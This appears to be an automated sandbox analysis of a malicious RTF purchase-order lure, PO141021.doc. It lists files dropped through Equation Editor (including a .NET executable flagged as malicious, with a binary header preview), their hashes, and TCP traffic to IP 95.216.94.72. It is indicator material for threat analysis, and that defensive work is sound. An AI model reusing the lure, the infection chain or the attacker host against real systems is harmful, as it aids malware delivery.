Preview:	L..................F.... ....92>....92>....d(.!...]............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S.....&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S ...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2.]...NSg. .PO141021.doc..F.......S...S...........................P.O.1.4.1.0.2.1...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\PO141021.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.1.4.1.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_....3N...W...9..g............[D_....3N...W...9..g............[

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	67
Entropy (8bit):	4.59044707940377
Encrypted:	false
SSDEEP:	3:bDuMJltIarulmX1gTarulv:bCmIaru1Taru1
MD5:	2A3D3B1490094BBA3C4AA5F1C810C0C8
SHA1:	62C2A898F16EAD12ACA0081FEB6BCB79EB1EC63A
SHA-256:	2133D7D2965CD863483469424A4235047458225E9E4A928C4DC78AA572256001
SHA-512:	644C09CD6B5AA9B3009F4F088A0D126B04AC5DC8A1472A085F5643DDCF268B2511E77C2510ACA26B14BF1DA8FEBACCAEF929234C3A869F0415E0AFD411C4D8AE
Malicious:	false
Reputation:	low
Preview:	[folders]..Templates.LNK=0..PO141021.LNK=0..[doc]..PO141021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\godsawqop.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	486912
Entropy (8bit):	6.762794264214071
Encrypted:	false
SSDEEP:	12288:yUfjnaH1FrQKkmWSc/kmGBbxiB7C7r/vHMUHvVgqA:irlkmWdGNxih2MUHvVgqA
MD5:	D1BAA9515F4C67A7B561938BBD81BC75
SHA1:	E83E455F636443C9F62D8C480FF060F7BB6DE3BE
SHA-256:	1FAC59451F582122CB2E5787E3A936A3001081DE3469E168207DA1A357DF691D
SHA-512:	2FC1E9B771191C52794F99AE1C1CAF70100C2A129634CA230EFA4007145C27D8AE7997AF83B6077BB6702B0D85EEB9F5429096ADAE6D2CC0601DCE0F4F5E171D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..W.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H..................\....B...b..........................................Ivan Medvedev...2~'....(......(....2~5....(......{...."..}......{...."..}......{...."..}....R~;....(.....{........{...."..}......{...."..}......{...."..}.....~>...~<....(....rKH.p~=....(....(......{...."..}......{...."..}....N.(....~?.....(......{...."..}.....~>...~@....(....rOH.p~B...raH.p~A....(.....d...(....(....>..(O.....}....>.{.....{....Zl>..(O.....}....f.{.....{....Zl#.-

C:\Users\user\Desktop\~$141021.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5:	45B1E2B14BE6C1EFC217DCE28709F72D
SHA1:	64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256:	508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512:	2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	5.819318498687373
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	PO141021.doc
File size:	104541
MD5:	9095b4b704c9f1ef75cc683b57e1f207
SHA1:	d88b99fc3fff5eac59d7fedd136fd467f1c17106
SHA256:	10df15707ce5a8b457ebccab5f4a5c3b2548ea755bc11666f5601583677f17b5
SHA512:	20ec8779f1ec2ac8accc0b002a0875ac054b65b6bb9d5781f30706c1b6d7fc323c0ed11262a1f95fb77a3b4dcff1acee8519b180c52ba6a4575ad531090de720
SSDEEP:	1536:bSEyBiaxTw33eWw9V698GpucnuCyYhPcLgVrDsDuofCXzsXhZ7+RboVsOA1tGn5t:hYw3uKDcUpsDADsXA3gOtA
File Content Preview:	{\rtf91886;'...??`.%0~.[1_\|\|????!.5\|[!9011<)?=,38<,%<^%.?[]6>+:?.;5?#4..`?,<,^/\|<.^)08.??9$78]&==-5)(??`,@7!?[#4_=12-.<&!.1?@](>%#@[7-5^+?92@64~%?.+<$?[38=4/62;.=[966\|@.;/^2.]`18%/+:)~.2!:~99_]~3%.$50<5036?27.1=;3$=(.28/?9-%_%+_?-/&<30.$'[@:.=&.&^_/?\|??

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000002AEh								no
1	00000291h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 10:34:58.288450956 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.327896118 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.327985048 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.328747034 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.368168116 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368735075 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368786097 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368824005 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368855953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.368863106 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368901014 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368901014 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.368938923 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.368949890 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.368977070 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.369000912 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.369024992 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.369040966 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.369066954 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.369087934 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.369103909 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.369131088 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.369173050 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.389110088 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408457041 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408509016 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408548117 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408550978 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408586025 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408602953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408607960 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408623934 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408633947 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408669949 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408682108 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408725023 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408726931 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408761978 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408763885 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408801079 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408809900 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408852100 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408852100 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408890963 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408891916 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408930063 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408931017 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.408967972 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.408977985 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409004927 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409008026 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409043074 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409055948 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409082890 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409096956 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409137011 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409162045 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409208059 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409208059 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409238100 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409245014 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409246922 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409282923 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.409285069 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409323931 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.409729004 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448632956 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448688030 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448721886 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448724031 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448745966 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448762894 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448767900 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448801994 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448810101 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448847055 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448849916 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448892117 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448895931 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448930025 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448939085 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.448970079 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.448975086 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449008942 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449013948 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449044943 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449053049 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449083090 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449089050 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449120998 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449145079 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449157953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449167967 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449209929 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449213982 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449249029 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449279070 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449280024 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449290991 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449321032 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449326038 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449368954 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449373007 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449412107 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449423075 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449451923 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449459076 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449491024 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449496984 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449528933 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449529886 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449564934 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449568987 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449604034 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449605942 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449641943 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449644089 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449681997 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449691057 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449728966 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449733019 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449769974 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449771881 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449809074 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449809074 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449846983 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449858904 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449882984 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449887991 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449920893 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449942112 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.449963093 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.449975967 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450001955 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450009108 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450048923 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450051069 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450090885 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450098991 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450133085 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450134993 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450176954 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450186014 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450222969 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.450225115 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450259924 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.450676918 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489531040 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489587069 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489607096 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489634037 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489634991 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489672899 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489681005 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489723921 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489725113 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489764929 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489765882 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489803076 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489805937 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489837885 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489850044 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489890099 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489892960 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489943027 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.489959002 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.489995956 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490012884 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490035057 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490036011 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490072966 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490080118 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490109921 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490117073 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490148067 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490149975 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490185022 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490190029 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490235090 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490447044 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490489006 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490493059 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490525961 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490530014 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490564108 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490567923 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490602016 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490605116 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490647078 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490649939 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490695953 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490695953 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490735054 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490748882 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490772963 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490780115 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490811110 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490816116 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490849972 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490878105 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490890026 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490894079 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490927935 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.490940094 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490972996 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.490976095 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491018057 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491019964 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491055965 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491064072 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491094112 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491101980 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491138935 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491162062 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491200924 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491205931 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491235971 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491242886 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491274118 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491276979 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491312027 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491321087 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491367102 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491372108 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491406918 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491419077 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491419077 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491456032 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491463900 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491493940 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491503000 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491532087 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491539955 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491568089 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491575003 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491605997 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491611004 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491642952 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.491650105 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.491687059 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.494040012 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529520035 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529572010 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529627085 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529670000 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529671907 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529711962 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529723883 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529733896 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529756069 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529774904 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529819012 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.529835939 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.529865026 CEST	49167	80	192.168.2.22	95.216.94.72
Oct 14, 2021 10:34:58.531312943 CEST	80	49167	95.216.94.72	192.168.2.22
Oct 14, 2021 10:34:58.531354904 CEST	80	49167	95.216.94.72	192.168.2.22
